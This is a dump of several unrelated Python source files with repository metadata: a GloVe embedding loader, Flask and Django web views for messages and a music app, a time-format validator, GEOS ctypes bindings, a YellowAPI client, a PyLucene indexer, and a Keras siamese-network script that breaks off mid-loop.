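# Example construction (values are illustrative only):
#   src = FileDatastore('SRC_CSV', path='./data', fileExt='.csv',
#                       delim=',', quotechar='"', isSrcSys=True)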
| [
"[email protected]"
] | |
3778801484833ddfb83ae9399c6ce822361bd792 | 9adbf55a256a550f2278c427285784d771c93519 | /Code/LSTM/africell_calls/models/net_utils.py | d3e024c1a5ecb28e0d2f03e09bbd137b5c6c12a5 | [
"Unlicense"
] | permissive | ssensalo/Sentitel | 17b8194c852b58eb28622fea052c32cc07f6d362 | 9e29d815964618f92eeb00b7cd76f1207d17d600 | refs/heads/master | 2023-04-08T13:38:26.008491 | 2021-04-28T19:47:26 | 2021-04-28T19:47:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | from gensim.models.keyedvectors import KeyedVectors
from gensim.test.utils import get_tmpfile
from gensim.scripts.glove2word2vec import glove2word2vec
import numpy as np
def get_init_embedding(reversed_dict, embedding_size):
print("Loading Glove vectors...")
glove_file = "glove/glove.6B.%dd.txt" % embedding_size
word2vec_file = get_tmpfile("word2vec_format.vec")
glove2word2vec(glove_file, word2vec_file)
word_vectors = KeyedVectors.load_word2vec_format(word2vec_file)
word_vec_list = list()
for _, word in sorted(reversed_dict.items()):
try:
word_vec = word_vectors.word_vec(word)
except KeyError:
word_vec = np.zeros([embedding_size], dtype=np.float32)
word_vec_list.append(word_vec)
return np.array(word_vec_list)
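# Minimal usage sketch (reversed_dict maps index -> token and is built
# elsewhere; the matching glove/glove.6B.<dim>d.txt file must exist):
#   init_matrix = get_init_embedding({0: "the", 1: "cat"}, 100)
#   init_matrix.shape  # -> (2, 100); tokens missing from GloVe become zeros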
| [
"[email protected]"
] | |
f59c709b4851d78914ab1e518de74e0898a6492d | 4e5b7350cea01dc2bfdf4ea24d5c45d5f4540ea9 | /app/messages/views.py | 5ff5e7bed97ad2c2eb777b62d12df498516dcb8f | [] | no_license | netoho/fastmonkeys | efeaed32941597d86f69a8db502c34176f1d0292 | e9934a6ff72bcb82c4ed306d6f800d75cb1832ea | refs/heads/master | 2020-06-03T06:37:44.868895 | 2013-09-03T19:47:47 | 2013-09-03T19:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | from app import login_manager
from app import (app, db)
from app.posts.models import Post
from app.messages.models import Message
from app.messages.forms import MessageForm
from flask.ext.login import login_required
from flask import (Blueprint, session, redirect, url_for,
render_template, flash, request)
import math
__author__ = 'netoho'
mod = Blueprint('messages', __name__, url_prefix='/messages')
NUM_PAGES = 5
@mod.route('/new', methods=['GET', 'POST'])
@login_required
def new_message():
form = MessageForm()
if form.validate_on_submit():
message = Message(body=form.body.data)
db.session.add(message)
db.session.commit()
flash("Message created successfully")
return redirect(url_for('posts.list_posts'))
else:
return render_template('posts/form.html', form=form, url=url_for('messages.new_message')) | [
"[email protected]"
] | |
c330379402f016903fc3297df4987fb347a0e0d8 | e79198e622758cfbe737f4389e775e7a931e1343 | /isValidTime.py | c0590fa90600e45c6ae5dd85f3a453c086e5dd7e | [] | no_license | MichaelGhizzi/Python | e26d2d20607f6f18034344954e93c6ce9904da1f | 9b6586397b45a57df27514bc6c0271700fe5dc23 | refs/heads/master | 2021-01-10T16:22:52.005125 | 2016-08-28T23:01:11 | 2016-08-28T23:01:11 | 51,849,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,319 | py | #!/usr/bin/python3
#---------------------
# Name: Michael Ghizzi
# Lab Project #5
# CPSC 254 8:00pm T/TH
# isValidTime.py
# This program has the user enter in a specific time via arguments, and the program defines if the time is valid or not.
#---------------------
import sys
import re
def main():
    # validates the command-line time string
    if len(sys.argv) != 2: # exactly one time argument is required
        # too few or too many arguments means we cannot validate a time
        print("ERROR: Invalid time. Usage: ./isValidTime.py '##:## am|AM|pm|PM'") # prints usage error
else:
        # Regular expression accepting an hour from 1-12, minutes 00-59, and
        # an optional space before am/AM/pm/PM; the trailing $ rejects any
        # extra text. It is matched against the first command-line argument.
        #pattern = re.compile(r"(12|11|10|0?[1-9]):([0-5][0-9]) ?([aApP])[mM]")
        pattern = re.compile(r"(12|11|10|0?[1-9]):([0-5][0-9])(\s)?(AM|am|pm|PM)$")
result = pattern.match(sys.argv[1])
        if result: # the pattern matched, so the time is valid
            print("is valid time")
        else: # no match, so the time is invalid
            print("invalid time")
# Standard Python entry-point guard: main() runs only when this file is
# executed directly, not when it is imported as a module.
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
584d9a4af69835aa15cfa9e2ae912447c8fd5ded | 1f4f14b3315428457538167795775d047e139e57 | /music/views.py | a3b5eb5aa199f69a4e53bb38a73ccb041348c12e | [] | no_license | johnYANGGAO/python_web_with_django | b1ac080b53fd740e91850e4c7f45b6fa927f9620 | a9de0b6d2f60bacbc83492e0d66d73a3144f93d8 | refs/heads/master | 2021-01-11T19:58:46.007546 | 2017-01-20T09:21:40 | 2017-01-20T09:21:40 | 79,436,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,334 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11/22/16 2:40 PM
# @Author : YangGao
# @File : views.py
# from django.http import Http404
from django.http import HttpResponse
from .models import Album, Song
from django.template import loader
from django.shortcuts import render, get_object_or_404
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.views import generic
from .forms import AlbumForm, UserForm, SongForm
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout
from django.db.models import Q
AUDIO_FILE_TYPES = ['wav', 'mp3', 'ogg']
IMAGE_FILE_TYPES = ['png', 'jpg', 'jpeg']
def index_render(request):
all_albums = Album.objects.all()
context = {
'all_albums': all_albums
}
return render(request, 'music/index.html', context)
def index_template(request):
all_albums = Album.objects.all()
template = loader.get_template('music/index.html')
context = {
'all_albums': all_albums,
}
return HttpResponse(template.render(context, request))
# def index(request):
# all_albums = Album.objects.all()
# html = ''
#
# for album in all_albums:
# url = '/music/' + str(album.id) + '/'
# html += '<a href="' + url + '">' + album.album_title + '</a><span>' + \
# '<a href="' + album.album_logo + '"> 专辑logo</a></span><br>'
#
# return HttpResponse(html)
def detail(request, album_id):
# try:
# album = Album.objects.get(pk=album_id)
# except Album.DoesNotExist:
# raise Http404('Album does not exist')
# '''No Album matches the given query.'''
album = get_object_or_404(Album, pk=album_id)
return render(request, 'music/detail.html', {
'album': album})
def favorite(request, album_id):
album = get_object_or_404(Album, pk=album_id)
try:
selected_song = album.song_set.get(pk=request.POST['song'])
except (KeyError, Song.DoesNotExist):
return render(request, 'music/a.html', {
            'album': album, 'error_message': 'no song was selected'})
else:
selected_song.is_favorite = True
selected_song.save()
return render(request, 'music/b.html', {'album': album})
def favorite_direct(request, album_id, song_id):
album = get_object_or_404(Album, pk=album_id)
selected_song = Song.objects.get(pk=song_id)
selected_song.is_favorite = True
selected_song.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
def cancel_favorite(request, album_id, song_id):
album = get_object_or_404(Album, pk=album_id)
selected_song = Song.objects.get(pk=song_id)
selected_song.is_favorite = False
selected_song.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
'''Display all favorite songs of the album identified by album_id in the browser.'''
def favorite_display(request, album_id):
album = get_object_or_404(Album, pk=album_id)
return render(request, 'music/b.html', {'album': album})
def all_songs_display_by_album_id(request, album_id):
album = get_object_or_404(Album, pk=album_id)
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
# class IndexView(generic.ListView):
# template_name = 'music/index.html'
# context_object_name = 'object_list'
#
# def get_queryset(self):
# return Album.objects.all()
def index_global(request):
if not request.user.is_authenticated():
return render(request, 'music/login.html')
else:
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
class DetailView(generic.DetailView):
model = Album
template_name = 'music/all_songs_by_albumID.html'
# class AlbumCreate(CreateView):
# # the name of html file must be album_form , then does work
# model = Album
# fields = ['artist', 'album_title', 'genre', 'album_logo']
def create_album(request):
if not request.user.is_authenticated():
return render(request, 'music/login.html')
else:
form = AlbumForm(request.POST or None, request.FILES or None)
'''TODO how to hide the attr like is_local_file in form'''
if form.is_valid():
album = form.save(commit=False)
album.user = request.user
album.is_local_file = True
album.album_logo = request.FILES['album_logo']
logo_type = album.album_logo.url.split('.')[-1]
logo_type = logo_type.lower()
if logo_type not in IMAGE_FILE_TYPES:
context = {
'album': album,
'form': form,
'error_message': 'Image file must be PNG, JPG, or JPEG',
}
return render(request, 'music/album_form.html', context)
album.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
context = {
"form": form,
}
return render(request, 'music/album_form.html', context)
def delete_album(request, album_id):
if not request.user.is_authenticated():
return render(request, 'music/login.html')
else:
album = Album.objects.get(pk=album_id)
album.delete()
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
def register(request):
form = UserForm(request.POST or None)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
context = {
"form": form,
}
return render(request, 'music/register.html', context)
def login_user(request):
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
print('user is active', user.is_active)
if user.is_active:
login(request, user)
print('user name is ', user.username)
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
else:
return render(request, 'music/login.html', {'error_message': 'Your account has been disabled'})
else:
return render(request, 'music/login.html', {'error_message': 'Invalid login'})
return render(request, 'music/login.html')
def logout_user(request):
logout(request)
form = UserForm(request.POST or None)
context = {
"form": form,
}
return render(request, 'music/login.html', context)
def display_search_results(request):
song_results = Song.objects.all()
query = request.GET.get("search")
if query:
song_results = song_results.filter(
Q(song_title__icontains=query)
).distinct()
if song_results:
return render(request, 'music/search_results.html', {
'songs': song_results,
})
else:
return render(request, 'music/no_answer_page.html')
def create_song(request, album_id):
form = SongForm(request.POST or None, request.FILES or None)
album = get_object_or_404(Album, pk=album_id)
if form.is_valid():
albums_songs = album.song_set.all()
for s in albums_songs:
if s.song_title == form.cleaned_data.get("song_title"):
context = {
'album': album,
'form': form,
'error_message': 'You already added that song',
}
return render(request, 'music/add_song.html', context)
song = form.save(commit=False)
song.album = album
song.audio_file = request.FILES['audio_file']
file_type = song.audio_file.url.split('.')[-1]
file_type = file_type.lower()
if file_type not in AUDIO_FILE_TYPES:
context = {
'album': album,
'form': form,
'error_message': 'Audio file must be WAV, MP3, or OGG',
}
return render(request, 'music/add_song.html', context)
song.file_type = file_type
song.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
context = {
'album': album,
'form': form,
}
return render(request, 'music/add_song.html', context)
def delete_song(request, album_id, song_id):
album = get_object_or_404(Album, pk=album_id)
song = Song.objects.get(pk=song_id)
song.delete()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
def play_song(request):
return render(request, 'music/player.html')
| [
"[email protected]"
] | |
3338255cae9bf2b53d9b53f0a16061db891618f2 | 41749b782cecd7364761a7768b09c8a0d1483618 | /.viz/Lib/site-packages/django/contrib/gis/geos/prototypes/geom.py | fa40a0b62b314cce16fb765a0e968c890d76b15a | [
"BSD-3-Clause"
] | permissive | Semiu/studentviz | c9a9a69d83bcb5e2e5b3768cf092ce00ada0d7db | 04f0850eb171cbbc5dc42bc079b60fe267c17157 | refs/heads/master | 2022-09-12T07:47:40.924894 | 2022-08-22T02:57:27 | 2022-08-22T02:57:27 | 158,165,526 | 0 | 0 | NOASSERTION | 2022-06-17T22:16:38 | 2018-11-19T05:15:04 | JavaScript | UTF-8 | Python | false | false | 3,332 | py | from ctypes import POINTER, c_char_p, c_int, c_ubyte, c_uint
from django.contrib.gis.geos.libgeos import CS_PTR, GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom,
check_minus_one,
check_string,
)
# This is the return type used by binary output (WKB, HEX) routines.
c_uchar_p = POINTER(c_ubyte)
# We create a simple subclass of c_char_p here because when the response
# type is set to c_char_p, you get a _Python_ string and there's no way
# to access the string's address inside the error checking function.
# In other words, you can't free the memory allocated inside GEOS. Previously,
# the return type would just be omitted and the integer address would be
# used -- but this allows us to be specific in the function definition and
# keeps the reference so it may be free'd.
class geos_char_p(c_char_p):
pass
# ### ctypes factory classes ###
class GeomOutput(GEOSFuncFactory):
"For GEOS routines that return a geometry."
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
class IntFromGeom(GEOSFuncFactory):
"Argument is a geometry, return type is an integer."
argtypes = [GEOM_PTR]
restype = c_int
errcheck = staticmethod(check_minus_one)
class StringFromGeom(GEOSFuncFactory):
"Argument is a Geometry, return type is a string."
argtypes = [GEOM_PTR]
restype = geos_char_p
errcheck = staticmethod(check_string)
# ### ctypes prototypes ###
# The GEOS geometry type, typeid, num_coordinates and number of geometries
geos_normalize = IntFromGeom("GEOSNormalize")
geos_type = StringFromGeom("GEOSGeomType")
geos_typeid = IntFromGeom("GEOSGeomTypeId")
get_dims = GEOSFuncFactory("GEOSGeom_getDimensions", argtypes=[GEOM_PTR], restype=c_int)
get_num_coords = IntFromGeom("GEOSGetNumCoordinates")
get_num_geoms = IntFromGeom("GEOSGetNumGeometries")
# Geometry creation factories
create_point = GeomOutput("GEOSGeom_createPoint", argtypes=[CS_PTR])
create_linestring = GeomOutput("GEOSGeom_createLineString", argtypes=[CS_PTR])
create_linearring = GeomOutput("GEOSGeom_createLinearRing", argtypes=[CS_PTR])
# Polygon and collection creation routines need argument types defined
# for compatibility with some platforms, e.g. macOS ARM64. With argtypes
# defined, arrays are automatically cast and byref() calls are not needed.
create_polygon = GeomOutput(
"GEOSGeom_createPolygon",
argtypes=[GEOM_PTR, POINTER(GEOM_PTR), c_uint],
)
create_empty_polygon = GeomOutput("GEOSGeom_createEmptyPolygon", argtypes=[])
create_collection = GeomOutput(
"GEOSGeom_createCollection",
argtypes=[c_int, POINTER(GEOM_PTR), c_uint],
)
# Ring routines
get_extring = GeomOutput("GEOSGetExteriorRing", argtypes=[GEOM_PTR])
get_intring = GeomOutput("GEOSGetInteriorRingN", argtypes=[GEOM_PTR, c_int])
get_nrings = IntFromGeom("GEOSGetNumInteriorRings")
# Collection Routines
get_geomn = GeomOutput("GEOSGetGeometryN", argtypes=[GEOM_PTR, c_int])
# Cloning
geom_clone = GEOSFuncFactory("GEOSGeom_clone", argtypes=[GEOM_PTR], restype=GEOM_PTR)
# Destruction routine.
destroy_geom = GEOSFuncFactory("GEOSGeom_destroy", argtypes=[GEOM_PTR])
# SRID routines
geos_get_srid = GEOSFuncFactory("GEOSGetSRID", argtypes=[GEOM_PTR], restype=c_int)
geos_set_srid = GEOSFuncFactory("GEOSSetSRID", argtypes=[GEOM_PTR, c_int])
| [
"[email protected]"
] | |
72407ed89d05a5b5653217cf17b7c98e1679fa7a | 4469dfcaeb9b491a23df1b574a2d54ab74bb153d | /appfeedme/yellowapi.py | e73f1b1b1e678edb40b5a4264f6f60282010b6f0 | [] | no_license | assertnotnull/feed.me | 149bd9abd697cdb67301a90c061ace52a9cfa14c | c9c4a268dfce555cc97d73c6d256bb89b49e8969 | refs/heads/master | 2021-01-19T05:20:04.489348 | 2014-04-16T19:22:51 | 2014-04-16T19:22:51 | 4,608,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,877 | py | """
YellowAPI Python API Library
Requires: Python 2.3+
Version: 0.1 (2010-09-15)
"""
import urllib2
import urllib
import itertools
import re
class YellowAPI(object):
"""
A thin wrapper around urllib2 to perform calls to YellowAPI. This class
does not do any processing of the response contents (XML or JSON).
"""
PROD_URL = 'http://api.yellowapi.com'
TEST_URL = 'http://api.sandbox.yellowapi.com'
def __init__(self, api_key, test_mode=False, format='XML', handlers=[]):
if len(api_key) != 24:
raise TypeError('api_key should be 24 characters.')
self.api_key = api_key
if test_mode:
self.url = self.TEST_URL
else:
self.url = self.PROD_URL
if format not in ['XML', 'JSON']:
raise TypeError('Format should be XML or JSON')
self.format = format
self.opener = urllib2.build_opener(*handlers)
self.last_url = None
def find_business(self, what, where, uid, page=None, page_len=None,
sflag=None, lang=None):
"""
Perform the FindBusiness call.
"""
url = self._build_url('FindBusiness', what=what, where=where, UID=uid,
pg=page, pgLen=page_len, sflag=sflag, lang=lang)
return self._perform_request(url)
def get_business_details(self, prov, business_name, listing_id, uid,
city=None, lang=None):
"""
Perform the GetBusinessDetails call.
"""
kws = {'prov': prov, 'bus-name': business_name,
'listingId': listing_id, 'city': city,
'lang': lang, 'UID': uid
}
url = self._build_url('GetBusinessDetails', **kws)
return self._perform_request(url)
def find_dealer(self, pid, uid, page=None, page_len=None, lang=None):
"""
Perform the FindDealer call.
"""
url = self._build_url('FindDealer', pid=pid, UID=uid, pg=page,
pgLen=page_len, lang=lang)
return self._perform_request(url)
def get_last_query(self):
"""
        Used for debugging purposes. Returns the URL string used in the
        most recent call.
"""
return self.last_url
NAME_PATTERN = re.compile('[^A-Za-z0-9]+')
@staticmethod
def encode_business_name(name):
"""
Properly encode the business name for subsequent queries.
"""
return YellowAPI.NAME_PATTERN.sub('-', name)
def _build_url(self, method, **kwargs):
"""
Build an HTTP url for the request.
"""
kwargs.update({'apikey': self.api_key, 'fmt': self.format})
params = ["%s=%s" % (k,urllib.quote(str(v))) for (k,v) in itertools.ifilter(
lambda (k,v): v is not None, kwargs.iteritems())]
self.last_url = "%s/%s/?%s" % (self.url, method, "&".join(params))
return self.last_url
def _perform_request(self, url):
"""
Perform the GET Request and handle HTTP response.
"""
resp = None
try:
resp = self.opener.open(url)
body = resp.read()
except urllib2.HTTPError, err:
if err.code == 400:
msg = err.read()
err.msg += "\n" + msg
raise(err)
finally:
if resp:
resp.close()
return body
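# Minimal usage sketch (Python 2; the API key and UID values are placeholders):
#   api = YellowAPI('0123456789abcdef01234567', test_mode=True)
#   xml = api.find_business(what='pizza', where='Toronto', uid='127.0.0.1')
#   print api.get_last_query()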
| [
"[email protected]"
] | |
2c0f680212d51ef2a600f4c5edf2dd6deae65d17 | 166bfd2ea9335362e44dc6aa910370329bf1e4c3 | /processing/__init__.py | bbaf18ddba0c7f443b9d29a7dc1d8ede2b7840e8 | [
"Apache-2.0"
] | permissive | ljthink/pyfecs | 8502d83c75d3742a722967197a9a867eb27ad146 | 38bf28decc5caf6c1f94263c9788880dd9c17707 | refs/heads/master | 2020-04-03T13:54:13.469391 | 2017-11-28T14:28:40 | 2017-11-28T14:28:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | """
Scripts concerned with processing raw data into objects ready for analysis.
Many of these can be run as semi-automated services.
""" | [
"[email protected]"
] | |
67549eb3ebb071caddfa86249289fba192ce0d44 | 074afd26d00bb742b03c12891b057ab263e640bf | /codeforces/1430A.py | 259ef4142c163c8fa3b5ce7e8ec89d1f9260b4f1 | [] | no_license | IsmailTitas1815/Data-Structure | 7a898800b1e53c778b1f2f11b0df259e52c20140 | fece8dd97d3e162e39fc31d5f3498a6dac49b0f0 | refs/heads/master | 2023-02-05T10:39:49.349484 | 2020-12-21T13:37:22 | 2020-12-21T13:37:22 | 296,343,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | for i in range(int(input())):
n = int(input())
if n<3 or n==4:
print(-1)
elif n%3==0:
print(n//3,0,0)
elif n%3==1:
print((n//3)-2,0,1)
elif n%3==2:
print((n//3)-1,1,0) | [
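# Writes n = 3a + 5b + 7c with a, b, c >= 0: multiples of 3 use only threes;
# n % 3 == 1 trades two threes for one seven (needs n >= 7); n % 3 == 2
# trades one three for one five (needs n >= 5). Only n in {1, 2, 4} fail.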
"[email protected]"
] | |
68f932c6112e815e3c6ea2b6718d9cc20bb4ab9a | ca4da546f815ef7e14fd79dfbc5a0c3f9f8c72c9 | /samples/LuceneInAction/lia/tools/BerkeleyDbIndexer.py | a5f57cf2e3ebbdef45a0169ea2edb661a337b8fc | [
"Apache-2.0"
] | permissive | qiugen/pylucene-trunk | be955aedca2d37411f0683e244c30b102d4839b4 | 990079ff0c76b972ce5ef2bac9b85334a0a1f27a | refs/heads/master | 2021-01-18T08:46:38.817236 | 2012-07-18T16:18:45 | 2012-07-18T16:18:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,388 | py | # ====================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ====================================================================
import os
from bsddb.db import DBEnv, DB
from bsddb.db import \
DB_INIT_MPOOL, DB_INIT_LOCK, DB_INIT_TXN, DB_THREAD, DB_CREATE, DB_BTREE
# missing from python interface at the moment
DB_LOG_INMEMORY = 0x00020000
from lucene import \
DbDirectory, IndexWriter, StandardAnalyzer, Document, Field
class BerkeleyDbIndexer(object):
def main(cls, argv):
if len(argv) < 2:
print "Usage: BerkeleyDbIndexer <index dir> -create"
return
dbHome = argv[1]
create = len(argv) > 2 and argv[2] == "-create"
if not os.path.exists(dbHome):
os.makedirs(dbHome)
elif create:
for name in os.listdir(dbHome):
if name.startswith('__'):
os.remove(os.path.join(dbHome, name))
env = DBEnv()
env.set_flags(DB_LOG_INMEMORY, 1);
if os.name == 'nt':
env.set_cachesize(0, 0x4000000, 1)
elif os.name == 'posix':
from commands import getstatusoutput
if getstatusoutput('uname') == (0, 'Linux'):
env.set_cachesize(0, 0x4000000, 1)
env.open(dbHome, (DB_CREATE | DB_THREAD |
DB_INIT_MPOOL | DB_INIT_LOCK | DB_INIT_TXN), 0)
index = DB(env)
blocks = DB(env)
txn = None
try:
txn = env.txn_begin(None)
index.open(filename = '__index__', dbtype = DB_BTREE,
flags = DB_CREATE | DB_THREAD, txn = txn)
blocks.open(filename = '__blocks__', dbtype = DB_BTREE,
flags = DB_CREATE | DB_THREAD, txn = txn)
except:
if txn is not None:
txn.abort()
txn = None
raise
else:
txn.commit()
txn = None
try:
txn = env.txn_begin(None)
directory = DbDirectory(txn, index, blocks, 0)
writer = IndexWriter(directory, StandardAnalyzer(), create,
IndexWriter.MaxFieldLength.UNLIMITED)
writer.setUseCompoundFile(False)
doc = Document()
doc.add(Field("contents", "The quick brown fox...",
Field.Store.YES, Field.Index.ANALYZED))
writer.addDocument(doc)
writer.commit()
writer.close()
except:
if txn is not None:
txn.abort()
txn = None
raise
else:
txn.commit()
index.close()
blocks.close()
env.close()
print "Indexing Complete"
main = classmethod(main)
| [
"[email protected]"
] | |
af150eafbd7e431eddf69d435af86c90726cd755 | 4cd28b2bd8ba92a5db81adadbf2ff8b1addbef5c | /python/siamese.py | c54512dcb3c8798d908a587e19186fedb0e61f25 | [] | no_license | mfsuve/GraduationProject | bd3f8b605f69809bf2fe0a37233efdf1179a0e3d | f408848be46a8fa7f66cab65a9212a78670b5908 | refs/heads/master | 2020-04-09T22:08:48.737997 | 2018-04-19T05:32:11 | 2018-04-19T05:32:11 | 124,243,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,933 | py | import cv2
from keras.layers import Input, Conv2D, Lambda, merge, Dense, Flatten, MaxPooling2D
from keras.models import Model, Sequential
from keras.regularizers import l2
from keras import backend as K
from keras.optimizers import SGD, Adam
from keras.losses import binary_crossentropy
import numpy.random as rng
import numpy as np
import os
import dill as pickle
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
# from scipy.misc import imread
data_path = '/home/mustafa/PCL_TUTORIAL/python/keras-oneshot/omniglot/python/'
def loadimgs(path,n=0):
#if data not already unzipped, unzip it.
if not os.path.exists(path):
print("unzipping")
os.chdir(data_path)
os.system("unzip {}".format(path+".zip"))
X = []
y = []
cat_dict = {}
lang_dict = {}
curr_y = n
#we load every alphabet seperately so we can isolate them later
for alphabet in os.listdir(path):
print("loading alphabet: " + alphabet)
lang_dict[alphabet] = [curr_y,None]
alphabet_path = os.path.join(path,alphabet)
#every letter/category has it's own column in the array, so load seperately
for letter in os.listdir(alphabet_path):
cat_dict[curr_y] = (alphabet, letter)
category_images=[]
letter_path = os.path.join(alphabet_path, letter)
for filename in os.listdir(letter_path):
image_path = os.path.join(letter_path, filename)
image = imread(image_path)
category_images.append(image)
y.append(curr_y)
try:
X.append(np.stack(category_images))
#edge case - last one
except ValueError as e:
print(e)
print("error - category_images:", category_images)
curr_y += 1
lang_dict[alphabet][1] = curr_y - 1
y = np.vstack(y)
X = np.stack(X)
return X, y, lang_dict
class Siamese_Loader:
"""For loading batches and testing tasks to a siamese net"""
def __init__(self, Xtrain, Xval):
self.Xval = Xval
self.Xtrain = Xtrain
self.n_classes, self.n_examples, self.w, self.h = Xtrain.shape
self.n_val, self.n_ex_val, _, _ = Xval.shape
def get_batch(self, n):
"""Create batch of n pairs, half same class, half different class"""
categories = rng.choice(self.n_classes, size=(n, ), replace=False)
pairs = [np.zeros((n, self.w, self.h, 1)) for i in range(2)]
targets = np.zeros((n, ))
targets[n//2:] = 1
for i in range(n):
category = categories[i]
idx_1 = rng.randint(0, self.n_examples)
pairs[0][i, :, :, :] = self.Xtrain[category, idx_1].reshape(self.w, self.h, 1)
idx_2 = rng.randint(0, self.n_examples)
category_2 = category if i >= n//2 else (category + rng.randint(1, self.n_classes)) % self.n_classes
pairs[1][i, :, :, :] = self.Xtrain[category_2, idx_2].reshape(self.w, self.h, 1)
return pairs, targets
def make_oneshot_task(self, N):
"""Create pairs of test image, support set for testing N way one-shot learning. """
categories = rng.choice(self.n_val, size=(N, ), replace=False)
indices = rng.randint(0, self.n_ex_val, size=(N, ))
true_category = categories[0]
ex1, ex2 = rng.choice(self.n_examples, replace=False, size=(2, ))
test_image = np.asarray([self.Xval[true_category, ex1, :, :]]*N).reshape(N, self.w, self.h, 1)
support_set = self.Xval[categories, indices, :, :]
support_set[0, :, :] = self.Xval[true_category, ex2]
support_set = support_set.reshape(N, self.w, self.h, 1)
pairs = [test_image, support_set]
targets = np.zeros((N, ))
targets[0] = 1
return pairs, targets
def test_oneshot(self, model, N, k, verbose=0):
"""Test average N way oneshot learning accuracy of a siamese neural net over k one-shot tasks"""
n_correct = 0
if verbose:
print("Evaluating model on {} unique {} way one-shot learning tasks ...".format(k, N))
for i in range(k):
inputs, targets = self.make_oneshot_task(N)
probs = model.predict(inputs)
print('#### i:', i)
if np.argmax(probs) == 0:
n_correct += 1
percent_correct = (100.0*n_correct / k)
if verbose:
print("Got an average of {}% {} way one-shot learning accuracy".format(percent_correct, N))
return percent_correct
def W_init(shape, name=None):
"""Initialize weights as in paper"""
values = rng.normal(loc=0, scale=1e-2, size=shape)
return K.variable(values, name=name)
def b_init(shape, name=None):
"""Initialize bias as in paper"""
values=rng.normal(loc=0.5, scale=1e-2, size=shape)
return K.variable(values, name=name)
print('## Creating siamese net')
input_shape = (150, 100, 1)
left_input = Input(input_shape)
right_input = Input(input_shape)
convnet = Sequential()
convnet.add(Conv2D(64, (10, 10), activation='relu', input_shape=input_shape, kernel_initializer=W_init, kernel_regularizer=l2(2e-4)))
convnet.add(MaxPooling2D())
convnet.add(Conv2D(128, (7, 7), activation='relu', kernel_regularizer=l2(2e-4), kernel_initializer=W_init, bias_initializer=b_init))
convnet.add(MaxPooling2D())
convnet.add(Conv2D(128, (4, 4), activation='relu', kernel_initializer=W_init, kernel_regularizer=l2(2e-4), bias_initializer=b_init))
convnet.add(MaxPooling2D())
convnet.add(Conv2D(256, (4, 4), activation='relu', kernel_initializer=W_init, kernel_regularizer=l2(2e-4), bias_initializer=b_init))
convnet.add(Flatten())
convnet.add(Dense(4096, activation="sigmoid", kernel_regularizer=l2(1e-3), kernel_initializer=W_init, bias_initializer=b_init))
encoded_l = convnet(left_input)
encoded_r = convnet(right_input)
L1_distance = lambda x: K.abs(x[0]-x[1])
both = merge([encoded_l, encoded_r], mode = L1_distance, output_shape=lambda x: x[0])
prediction = Dense(1, activation='sigmoid', bias_initializer=b_init)(both)
siamese_net = Model(input=[left_input, right_input], output=prediction)
print('## Compiling siamese net')
optimizer = Adam(0.00006)
siamese_net.compile(loss="binary_crossentropy", optimizer=optimizer)
siamese_net.count_params()
# print('## images background loading')
# Xt, y, c = loadimgs('/home/mustafa/PCL_TUTORIAL/python/keras-oneshot/omniglot/python/images_background')
# print('Xt shape:', np.shape(Xt))
# print('y shape:', np.shape(y))
# print('c shape:', np.shape(c))
# print('## images evaluation loading')
# Xv, y, c = loadimgs('/home/mustafa/PCL_TUTORIAL/python/keras-oneshot/omniglot/python/images_evaluation')
# print('Xv shape:', np.shape(Xv))
# print('y shape:', np.shape(y))
# print('c shape:', np.shape(c))
def my_loader(path):
i = 0
Xt = []
Xv = []
for filename in os.listdir(path):
filepath = os.path.join(path, filename)
image = cv2.imread(filepath)
image = cv2.resize(image, (100, 150), interpolation=cv2.INTER_CUBIC)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if i < 65:
Xt.append(image)
else:
Xv.append(image)
i += 1
return np.expand_dims(np.stack(Xt), axis=1), np.expand_dims(np.stack(Xv), axis=1)
Xt, Xv = my_loader('/home/mustafa/PCL_TUTORIAL/python/finals/reduced/train')
print('Xt shape:', Xt.shape)
print('Xv shape:', Xv.shape)
loader = Siamese_Loader(Xt, Xv)
evaluate_every = 10
loss_every = 300
batch_size = 32
N_way = 20
n_val = 550
# siamese_net.load_weights("PATH")
best = 76.0
print('## Entering the loop')
for i in range(900000):
(inputs, targets) = loader.get_batch(batch_size)
# print('## i:', i)
# for ii in range(len(targets)):
